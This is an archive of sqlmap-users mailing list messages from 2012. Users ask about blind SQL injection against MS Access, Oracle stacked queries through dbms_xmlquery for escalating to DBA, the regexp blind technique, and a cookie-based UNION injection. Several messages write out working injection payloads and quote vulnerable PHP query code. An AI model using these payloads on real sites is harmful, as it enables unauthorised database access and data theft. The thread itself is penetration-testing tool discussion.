I do not really know how to use SQL map on MS access backend. I'm trying to test a website, But I'm stuck here sqlmap identified the following injection points with a total of 20 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=32 AND 1922=1922 I would understand what to do if this was just a normal php server, and bring up the tables but this obviously is not the same. Can someone please help me? kyl...@gm... Regards! |
|
From: Chris O. <chr...@gm...> - 2012-10-04 12:28:07
|
Hi Bernardo Thanks for a very comprehensive reply. Your ticket #16 is something I'm going to be doing very soon, I need more practice with this. I'll check out some of those aux modules too. The David Litchfield papers linked from one of your tickets is also interesting reading. The user has the following privs: SELECT * FROM session_privs; [11]: [*] CREATE CLUSTER [*] CREATE INDEXTYPE [*] CREATE OPERATOR [*] CREATE PROCEDURE [*] CREATE SEQUENCE [*] CREATE SESSION [*] CREATE SYNONYM [*] CREATE TABLE [*] CREATE TRIGGER [*] CREATE TYPE [*] UNLIMITED TABLESPACE So I think something should be possible here. Regards Chris On 4 October 2012 12:27, Bernardo Damele A. G. <ber...@gm...>wrote: > Hi Chris, > > On 3 October 2012 21:33, Chris Oakley <chr...@gm...> > wrote: > > Hi All > > > > When I get an injection for an Oracle system on the back end, I can use > > --sql-shell with no problems. However, if I try to use stacked queries > > here, I get an error message from SQLMap saying that I can't do that > unless > > stacked queries are enabled, which as far as I know you can't do with > > Oracle, so that makes sense. > > Web application programming languages like PHP, ASP, ASP.NET and JSP > have obviously functions to query Oracle (or rely on ODBC/JDBC or > similar drivers). Regardless, they do not interpret and stack up > separate queries sequentially when semi-colon (;) is provided hence > stacked queries SQL injection by default won't work. > However, when the SQL injection is within a Oracle function and PL/SQL > code is allowed, you can stack queries sequentially. We have an open > ticket to deal with this, > https://github.com/sqlmapproject/sqlmap/issues/16 > > > However, I've been reading and it seems (I could be wrong here, still > > playing) that from 8i to 11g R2 there are packages which allow execution > of > > anonymous PL/SQL blocks - dbms_xmlquery.newcontext() and > > dbms_xmlquery.getxml(). These are accessible to public by default. So > an > > injection might be ?id=1 and (select dbms_xmlquery.newcontext('various; > > stacked; queries;') from dual) is not null -- I've looked at SQLMaps > > queries through a proxy and I don't think it does anything like this. > > Again, I'm just reading up on this now so I could well be off base here. > > Correct. There're a few tricks as far as I am aware to stack queries > in Oracle. This is one of those. sqlmap does not implement yet any of > these. > > > Ultimately, I'm trying to use the injection to gain DBA privs. I'm > playing > > around manually at the moment but wondered if this is something SQLMap > could > > potentially do and doesn't (or I'm totally wrong!) > > Depending on the Oracle release and its version, you can leverage > different PL/SQL injection in default functions/triggers to escalate > your privileges to DBA. Metasploit has auxiliary modules for a number > of these vulnerabilities, see here > > https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/sqli/oracle > . > Look at the source code and forge your SQLi payload accordingly. > We have an open ticket to automate DBA privilege escalation on Oracle, > https://github.com/sqlmapproject/sqlmap/issues/29. > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > |
|
From: Bernardo D. A. G. <ber...@gm...> - 2012-10-04 11:27:48
|
Hi Chris, On 3 October 2012 21:33, Chris Oakley <chr...@gm...> wrote: > Hi All > > When I get an injection for an Oracle system on the back end, I can use > --sql-shell with no problems. However, if I try to use stacked queries > here, I get an error message from SQLMap saying that I can't do that unless > stacked queries are enabled, which as far as I know you can't do with > Oracle, so that makes sense. Web application programming languages like PHP, ASP, ASP.NET and JSP have obviously functions to query Oracle (or rely on ODBC/JDBC or similar drivers). Regardless, they do not interpret and stack up separate queries sequentially when semi-colon (;) is provided hence stacked queries SQL injection by default won't work. However, when the SQL injection is within a Oracle function and PL/SQL code is allowed, you can stack queries sequentially. We have an open ticket to deal with this, https://github.com/sqlmapproject/sqlmap/issues/16 > However, I've been reading and it seems (I could be wrong here, still > playing) that from 8i to 11g R2 there are packages which allow execution of > anonymous PL/SQL blocks - dbms_xmlquery.newcontext() and > dbms_xmlquery.getxml(). These are accessible to public by default. So an > injection might be ?id=1 and (select dbms_xmlquery.newcontext('various; > stacked; queries;') from dual) is not null -- I've looked at SQLMaps > queries through a proxy and I don't think it does anything like this. > Again, I'm just reading up on this now so I could well be off base here. Correct. There're a few tricks as far as I am aware to stack queries in Oracle. This is one of those. sqlmap does not implement yet any of these. > Ultimately, I'm trying to use the injection to gain DBA privs. I'm playing > around manually at the moment but wondered if this is something SQLMap could > potentially do and doesn't (or I'm totally wrong!) Depending on the Oracle release and its version, you can leverage different PL/SQL injection in default functions/triggers to escalate your privileges to DBA. Metasploit has auxiliary modules for a number of these vulnerabilities, see here https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/sqli/oracle. Look at the source code and forge your SQLi payload accordingly. We have an open ticket to automate DBA privilege escalation on Oracle, https://github.com/sqlmapproject/sqlmap/issues/29. -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) |
|
From: Chris O. <chr...@gm...> - 2012-10-03 20:33:49
|
Hi All
When I get an injection for an Oracle system on the back end, I can use
--sql-shell with no problems. However, if I try to use stacked queries
here, I get an error message from SQLMap saying that I can't do that unless
stacked queries are enabled, which as far as I know you can't do with
Oracle, so that makes sense.
However, I've been reading and it seems (I could be wrong here, still
playing) that from 8i to 11g R2 there are packages which allow execution of
anonymous PL/SQL blocks - dbms_xmlquery.newcontext() and
dbms_xmlquery.getxml(). These are accessible to public by default. So an
injection might be ?id=1 and (select dbms_xmlquery.newcontext('various;
stacked; queries;') from dual) is not null -- I've looked at SQLMaps
queries through a proxy and I don't think it does anything like this.
Again, I'm just reading up on this now so I could well be off base here.
Ultimately, I'm trying to use the injection to gain DBA privs. I'm playing
around manually at the moment but wondered if this is something SQLMap
could potentially do and doesn't (or I'm totally wrong!)
Regards
Chris
|
|
From: Miroslav S. <mir...@gm...> - 2012-09-27 08:12:07
|
Hi Jerome. Could you explain how "regexp attacks" are different than blind-based inference (in terms of "faster")? Could you explain how "regexp attacks" could be used in time-based attacks (in terms of "faster") in real life situations where network lags are non-deterministic? My 2-cents. That paper is known to me from the time it got out. Personally I don't like it because here and there I need to explain what's wrong with it. It's an example what "far fetched" means. Last couple of graphs are doing a comparison between "normal" and "regex", while that what is called "normal" is not used anywhere. What they are calling a "normal" is nothing else than a sequential lookup for a character value. Anyone normal is using at least some kind of O(Log2n) binary search in their tools/scripts. In short, "regexp attack" is the same thing as any other binary search method. We use in sqlmap an approach that is graphically described at [1]. Also, you are welcome to watch for all the payloads that are coming out from sqlmap in `--technique=B` mode by using `-v 3`. Count them down per each character and freely compare to their results. Kind regards, Miroslav Stampar [1] Slide 35, http://www.slideshare.net/stamparm/euro-python-2011miroslavstamparsqlmapsecuritydevelopmentinpython On Wed, Sep 26, 2012 at 8:13 PM, Jerome Athias <ath...@gm...>wrote: > Hi, > > I am currently trying to add the support of the regexp technique ( > http://www.ihteam.net/papers/blind-sqli-regexp-attack.pdf ) for blind > sqli. > It is faster than Time-based blind SQL injection. > I have some problems to define the correct queries and payloads in the > xml files. > Did someone already worked on it? > > Regards > /JA > > > ------------------------------------------------------------------------------ > How fast is your code? > 3 out of 4 devs don\\\'t know how their code performs in production. > Find out how slow your code is with AppDynamics Lite. > http://ad.doubleclick.net/clk;262219672;13503038;z? > http://info.appdynamics.com/FreeJavaPerformanceDownload.html > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: Jerome A. <ath...@gm...> - 2012-09-26 18:13:09
|
Hi, I am currently trying to add the support of the regexp technique ( http://www.ihteam.net/papers/blind-sqli-regexp-attack.pdf ) for blind sqli. It is faster than Time-based blind SQL injection. I have some problems to define the correct queries and payloads in the xml files. Did someone already worked on it? Regards /JA |
|
From: Luka P. <lu...@pu...> - 2012-09-24 20:34:09
|
You say that you are using two tamper scripts... I would look for interference there. Can you post more details about your configuration? Best regards, Luka On Mon, Sep 24, 2012 at 10:30 PM, Miroslav Stampar < mir...@gm...> wrote: > Hi Jack. > > I believe that you are talking about Microsoft SQL Server. sqlmap > automatically removes dbo prefix for that DBMS as it should not make any > difference (dbo == database owner). So, database.dbo.table should be the > same as database..table. Maybe you have some other issue? > > Kind regards, > Miroslav Stampar > > On Sun, Sep 23, 2012 at 3:07 PM, Jack Jones <ab...@li...> wrote: > >> Dears, >> >> Everytime i send an sqlmap query with a table name such as DBO.USERS it >> forgets about the DBO. and only look for USERS and there is no such table. >> >> in the query, two tampers are being used. >> >> Please advice thanks >> >> >> ------------------------------------------------------------------------------ >> Everyone hates slow websites. So do we. >> Make your web apps faster with AppDynamics >> Download AppDynamics Lite for free today: >> http://ad.doubleclick.net/clk;258768047;13503038;j? >> http://info.appdynamics.com/FreeJavaPerformanceDownload.html >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Miroslav S. <mir...@gm...> - 2012-09-24 20:30:10
|
Hi Jack. I believe that you are talking about Microsoft SQL Server. sqlmap automatically removes dbo prefix for that DBMS as it should not make any difference (dbo == database owner). So, database.dbo.table should be the same as database..table. Maybe you have some other issue? Kind regards, Miroslav Stampar On Sun, Sep 23, 2012 at 3:07 PM, Jack Jones <ab...@li...> wrote: > Dears, > > Everytime i send an sqlmap query with a table name such as DBO.USERS it > forgets about the DBO. and only look for USERS and there is no such table. > > in the query, two tampers are being used. > > Please advice thanks > > > ------------------------------------------------------------------------------ > Everyone hates slow websites. So do we. > Make your web apps faster with AppDynamics > Download AppDynamics Lite for free today: > http://ad.doubleclick.net/clk;258768047;13503038;j? > http://info.appdynamics.com/FreeJavaPerformanceDownload.html > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Jack J. <ab...@li...> - 2012-09-23 13:19:44
|
Dears, Everytime i send an sqlmap query with a table name such as DBO.USERS it forgets about the DBO. and only look for USERS and there is no such table. in the query, two tampers are being used. Please advice thanks |
|
From: mitchell <mit...@tu...> - 2012-09-22 19:22:28
|
...or he has used the --replicate switch, and now asks how to view the data? @Iago if this is the case, then you can use # sqlite3 filename.db (where filename.db is the name of the sqlite3 database) to connect to a sqlite3 database. Then, you can use .help for more information. ~m. On Sat, Sep 22, 2012 at 9:35 PM, Miroslav Stampar < mir...@gm...> wrote: > Hi Iago. > > Sorry, but it's not really clear what are you trying to do. You mean that > you want to convert dumped content from CSV to sqlite3 DB or something else? > > Kind regards, > Miroslav Stampar > > On Sat, Sep 22, 2012 at 6:12 PM, Iago Sousa <146...@gm...> wrote: > >> Hello there, >> Can I read dumped db into sqlite3 file without sqlmap? >> >> I apologize for my little knowledge, but I really dunno how to do this. >> >> -- >> Regards, Iago Sousa >> >> >> ------------------------------------------------------------------------------ >> How fast is your code? >> 3 out of 4 devs don\\\'t know how their code performs in production. >> Find out how slow your code is with AppDynamics Lite. >> http://ad.doubleclick.net/clk;262219672;13503038;z? >> http://info.appdynamics.com/FreeJavaPerformanceDownload.html >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > > > ------------------------------------------------------------------------------ > How fast is your code? > 3 out of 4 devs don\\\'t know how their code performs in production. > Find out how slow your code is with AppDynamics Lite. > http://ad.doubleclick.net/clk;262219672;13503038;z? > http://info.appdynamics.com/FreeJavaPerformanceDownload.html > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Miroslav S. <mir...@gm...> - 2012-09-22 19:12:56
|
Hi. 1) For browsing sqlite3 database I would recommend "SQLite Database Browser" [1]. On Windows machine you are gonna need to download and install it. On Linux you should be able to find it in default repositories (e.g. apt-get install sqlitebrowser). 2) For converting from CSV to sqlite3 I would recommend you to follow steps given at [2]. In case of any problems I could make you a small python script which would do this for you. Kind regards, Miroslav Stampar [1] http://sourceforge.net/projects/sqlitebrowser/ [2] http://smallbusiness.chron.com/import-csv-sqlite-48112.html On Sat, Sep 22, 2012 at 8:53 PM, Iago Sousa <146...@gm...> wrote: > Yes mitchell, I really wanted that. > > And I add the question that Miroslav has proposed. > > > On Sat, Sep 22, 2012 at 3:50 PM, mitchell <mit...@tu...> wrote: > >> ...or he has used the --replicate switch, and now asks how to view the >> data? @Iago if this is the case, then you can use >> >> # sqlite3 filename.db >> >> (where filename.db is the name of the sqlite3 database) to connect to a >> sqlite3 database. >> >> Then, you can use .help for more information. >> >> ~m. >> >> >> On Sat, Sep 22, 2012 at 9:35 PM, Miroslav Stampar < >> mir...@gm...> wrote: >> >>> Hi Iago. >>> >>> Sorry, but it's not really clear what are you trying to do. You mean >>> that you want to convert dumped content from CSV to sqlite3 DB or something >>> else? >>> >>> Kind regards, >>> Miroslav Stampar >>> >>> On Sat, Sep 22, 2012 at 6:12 PM, Iago Sousa <146...@gm...> wrote: >>> >>>> Hello there, >>>> Can I read dumped db into sqlite3 file without sqlmap? >>>> >>>> I apologize for my little knowledge, but I really dunno how to do this. >>>> >>>> -- >>>> Regards, Iago Sousa >>>> >>>> >>>> ------------------------------------------------------------------------------ >>>> How fast is your code? >>>> 3 out of 4 devs don\\\'t know how their code performs in production. >>>> Find out how slow your code is with AppDynamics Lite. >>>> http://ad.doubleclick.net/clk;262219672;13503038;z? >>>> http://info.appdynamics.com/FreeJavaPerformanceDownload.html >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>> >>>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> >>> >>> ------------------------------------------------------------------------------ >>> How fast is your code? >>> 3 out of 4 devs don\\\'t know how their code performs in production. >>> Find out how slow your code is with AppDynamics Lite. >>> http://ad.doubleclick.net/clk;262219672;13503038;z? >>> http://info.appdynamics.com/FreeJavaPerformanceDownload.html >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> > > > -- > Regards, Iago Sousa > Programmer and Security Researcher > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Iago S. <146...@gm...> - 2012-09-22 18:53:45
|
Yes mitchell, I really wanted that. And I add the question that Miroslav has proposed. On Sat, Sep 22, 2012 at 3:50 PM, mitchell <mit...@tu...> wrote: > ...or he has used the --replicate switch, and now asks how to view the > data? @Iago if this is the case, then you can use > > # sqlite3 filename.db > > (where filename.db is the name of the sqlite3 database) to connect to a > sqlite3 database. > > Then, you can use .help for more information. > > ~m. > > > On Sat, Sep 22, 2012 at 9:35 PM, Miroslav Stampar < > mir...@gm...> wrote: > >> Hi Iago. >> >> Sorry, but it's not really clear what are you trying to do. You mean that >> you want to convert dumped content from CSV to sqlite3 DB or something else? >> >> Kind regards, >> Miroslav Stampar >> >> On Sat, Sep 22, 2012 at 6:12 PM, Iago Sousa <146...@gm...> wrote: >> >>> Hello there, >>> Can I read dumped db into sqlite3 file without sqlmap? >>> >>> I apologize for my little knowledge, but I really dunno how to do this. >>> >>> -- >>> Regards, Iago Sousa >>> >>> >>> ------------------------------------------------------------------------------ >>> How fast is your code? >>> 3 out of 4 devs don\\\'t know how their code performs in production. >>> Find out how slow your code is with AppDynamics Lite. >>> http://ad.doubleclick.net/clk;262219672;13503038;z? >>> http://info.appdynamics.com/FreeJavaPerformanceDownload.html >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> >> >> ------------------------------------------------------------------------------ >> How fast is your code? >> 3 out of 4 devs don\\\'t know how their code performs in production. >> Find out how slow your code is with AppDynamics Lite. >> http://ad.doubleclick.net/clk;262219672;13503038;z? >> http://info.appdynamics.com/FreeJavaPerformanceDownload.html >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > -- Regards, Iago Sousa Programmer and Security Researcher |
|
From: Iago S. <146...@gm...> - 2012-09-22 18:51:12
|
I want to convert sqlite3 into CSV, and the other way around (vice versa), and I'd like to know if can I read the sqlite3 without sqlmap. I can use the line below to read all tables in site stored in sqlite3 file: ./sqlmap.py -d sqlite://output/site/dump/db.sqlite3 --table Can I read in sqlite3 DB without using sqlmap.py? Using the sqlite3 itself. I only want to know, if is not possible, there is no problem here. Sorry for no clear message. On Sat, Sep 22, 2012 at 3:35 PM, Miroslav Stampar < mir...@gm...> wrote: > Hi Iago. > > Sorry, but it's not really clear what are you trying to do. You mean that > you want to convert dumped content from CSV to sqlite3 DB or something else? > > Kind regards, > Miroslav Stampar > > On Sat, Sep 22, 2012 at 6:12 PM, Iago Sousa <146...@gm...> wrote: > >> Hello there, >> Can I read dumped db into sqlite3 file without sqlmap? >> >> I apologize for my little knowledge, but I really dunno how to do this. >> >> -- >> Regards, Iago Sousa >> >> >> ------------------------------------------------------------------------------ >> How fast is your code? >> 3 out of 4 devs don\\\'t know how their code performs in production. >> Find out how slow your code is with AppDynamics Lite. >> http://ad.doubleclick.net/clk;262219672;13503038;z? >> http://info.appdynamics.com/FreeJavaPerformanceDownload.html >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Regards, Iago Sousa Programmer and Security Researcher |
|
From: Miroslav S. <mir...@gm...> - 2012-09-22 18:35:17
|
Hi Iago. Sorry, but it's not really clear what are you trying to do. You mean that you want to convert dumped content from CSV to sqlite3 DB or something else? Kind regards, Miroslav Stampar On Sat, Sep 22, 2012 at 6:12 PM, Iago Sousa <146...@gm...> wrote: > Hello there, > Can I read dumped db into sqlite3 file without sqlmap? > > I apologize for my little knowledge, but I really dunno how to do this. > > -- > Regards, Iago Sousa > > > ------------------------------------------------------------------------------ > How fast is your code? > 3 out of 4 devs don\\\'t know how their code performs in production. > Find out how slow your code is with AppDynamics Lite. > http://ad.doubleclick.net/clk;262219672;13503038;z? > http://info.appdynamics.com/FreeJavaPerformanceDownload.html > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Iago S. <146...@gm...> - 2012-09-22 16:12:41
|
Hello there,
Can I read dumped db into sqlite3 file without sqlmap?
I apologize for my little knowledge, but I really dunno how to do this.
--
Regards, Iago Sousa
|
|
From: Miroslav S. <mir...@gm...> - 2012-09-17 20:40:05
|
Hi Stephen.
There is really a problem here. Could you please update to the latest
revision and do the:
... --flush-session -t traffic.txt -v 3
and send back new session file. It seems that for some reason sqlmap is
doing only one type of boundaries in your case (skipping this simple: ') ...
Also, it would be great if you send a full console output of such clean run
(please, use -v 3).
Kind regards,
Miroslav Stampar
On Sun, Sep 16, 2012 at 9:33 PM, Stephen Shkardoon <ss...@ss...>wrote:
> Hi,
>
> This is the HTML from a manual request with sesh cookie set
> to ')%20UNION%20select%201,2,3,4%20--%20
>
> <html>
> <head>
> <link rel='stylesheet' href='css/styles.css'/>
> <title>My Account - Customer Care Centre - Acme Power Co</title>
> </head>
> <body>
>
> <div id='heading'>
> </div>
>
> <div id='menu'>
> <a href='index.php'>Home / Login</a> -
> <a href='account.php'>My Account</a> -
> <a href='support.php'>Contact Support</a> -
> <a href='#'
> onClick='javascript:window.open("hours.php?data=ccc","newwin","width=210,height=200")'>CCC
> Opening Hours</a> -
> <a href='logout.php'>Logout</a>;
> </div>
>
>
> <div id='content'>
> <div id='billz'>
> Hi, 2!<br><br> Have a token:
> 86a2aeef8813bfa37a354e8997c77388<br><br>Please find below your account
> statement, released 04 November 2011. This account is due to be paid on
> <b>05 November 2011</b>. Failure to pay this amount before the due date may
> result in service disruption.<br><br><h3>Account
> Statement</h3><hr><table><tr><td width=200>Account Number</td><td
> width=450>Description of
> Service</td><td>Amount</td></tr></table><hr><table><tr><td
> width=200>1</td><td width=450>Basic Power
> Service</td><td>4</td></tr></table>
> </div>
> </div>
>
> </body>
> </html>
>
> ---------------------------
>
> The relevant bits being "Hi, 2", and the table showing amount of "4" etc.
>
> Thanks,
> ss23
>
> On Mon, Sep 17, 2012 at 6:58 AM, Miroslav Stampar <
> mir...@gm...> wrote:
>
>> Hi Stephen.
>>
>> From this traffic file it's not really clear if this is exploitable by
>> any mean more than time-based.
>>
>> Could you please send the response you get when you "manually exploit" it
>> with the payload you've mentioned:
>> "sesh=')%20UNION%20select%201,2,3,4%20--%20" ?
>>
>> Kind regards,
>> Miroslav Stampar
>>
>>
>> On Sat, Sep 15, 2012 at 1:33 AM, Stephen Shkardoon <ss...@ss...>wrote:
>>
>>> It ran a little over and started testing User-Agent, but it has the
>>> entire log for the session cookie there.
>>> The options I used this time were:
>>> python2 sqlmap.py -u "http://10.100.0.26/account.php" --cookie="sesh=1"
>>> -t traffic.txt --level=5
>>>
>>> Thanks,
>>> ss23
>>>
>>>
>>> On Sat, Sep 15, 2012 at 10:31 AM, Miroslav Stampar <
>>> mir...@gm...> wrote:
>>>
>>>> Hi.
>>>>
>>>> In that case could you please send the sqlmap traffic file got by using
>>>> -t traffic.txt along with your standard switches/options?
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>>
>>>> On Sat, Sep 15, 2012 at 12:09 AM, Stephen Shkardoon <ss...@ss...>wrote:
>>>>
>>>>> Hi,
>>>>>
>>>>> Sorry, my mistake. I just copied the line and altered it to show that
>>>>> the cookie was being used. In the real script, there was no parse error.
>>>>> Nonetheless, sqlmap cannot pull out results.
>>>>>
>>>>> Thanks
>>>>> ss23
>>>>>
>>>>> On Sat, Sep 15, 2012 at 9:55 AM, Miroslav Stampar <
>>>>> mir...@gm...> wrote:
>>>>>
>>>>>> Hi.
>>>>>>
>>>>>> I am not sure how are you able to "definitely able to pull out
>>>>>> results" as as I can see the problem lies in used PHP (enclosed pair of
>>>>>> single quotes with another pair of single quotes):
>>>>>>
>>>>>> Bad:
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>>> sessionid = *'$_COOKIE['sesh']'*)");
>>>>>>
>>>>>> Good 1:
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>>> sessionid = *'$_COOKIE[sesh]'*)");
>>>>>>
>>>>>> Good 2:
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>>> sessionid = " . *$_COOKIE['sesh'] . "*)");
>>>>>>
>>>>>> With that code of yours you should get an ugly PHP error message:
>>>>>> "Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE,
>>>>>> expecting T_STRING or T_VARIABLE or T_NUM_STRING"
>>>>>>
>>>>>> Also, you could take a look at similar case here [1].
>>>>>>
>>>>>> Kind regards,
>>>>>> Miroslav Stampar
>>>>>>
>>>>>> [1]
>>>>>> http://www.hotscripts.com/forums/php/21179-php-parse-error-parse-error-unexpected-t_encapsed_and_whitespace-expecting-t_strin.html
>>>>>>
>>>>>> On Fri, Sep 14, 2012 at 8:08 PM, Stephen Shkardoon <ss...@ss...
>>>>>> > wrote:
>>>>>>
>>>>>>> Hi all,
>>>>>>>
>>>>>>> Trying to do a (simple) injection with sqlmap, and I can't seem to
>>>>>>> coax it into getting it right.
>>>>>>> The PHP source looks something like:
>>>>>>>
>>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>>>> sessionid = '$_COOKIE['sesh']')");
>>>>>>>
>>>>>>> and then it displays the fields it pulled out.
>>>>>>>
>>>>>>> The command(s) I've tried look something like ./sqlmap.py -u
>>>>>>> site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5
>>>>>>> --risk=5. However, the only injection point it finds is AND/OR time-based
>>>>>>> blind, which is horribly slow. Of course, manually, I can do a
>>>>>>> sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so
>>>>>>> I'm definitely able to pull out results.
>>>>>>>
>>>>>>> Anything I can do to push sqlmap in the right direction?
>>>>>>>
>>>>>>> Thanks,
>>>>>>> ss23
>>>>>>>
>>>>>>>
>>>>>>> ------------------------------------------------------------------------------
>>>>>>> Got visibility?
>>>>>>> Most devs has no idea what their production app looks like.
>>>>>>> Find out how fast your code is with AppDynamics Lite.
>>>>>>> http://ad.doubleclick.net/clk;262219671;13503038;y?
>>>>>>> http://info.appdynamics.com/FreeJavaPerformanceDownload.html
>>>>>>> _______________________________________________
>>>>>>> sqlmap-users mailing list
>>>>>>> sql...@li...
>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>
>>>>>>>
>>>>>>
>>>>>>
>>>>>> --
>>>>>> Miroslav Stampar
>>>>>> http://about.me/stamparm
>>>>>>
>>>>>
>>>>>
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>>
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
--
Miroslav Stampar
http://about.me/stamparm
|
48 messages has been excluded from this view by a project administrator.
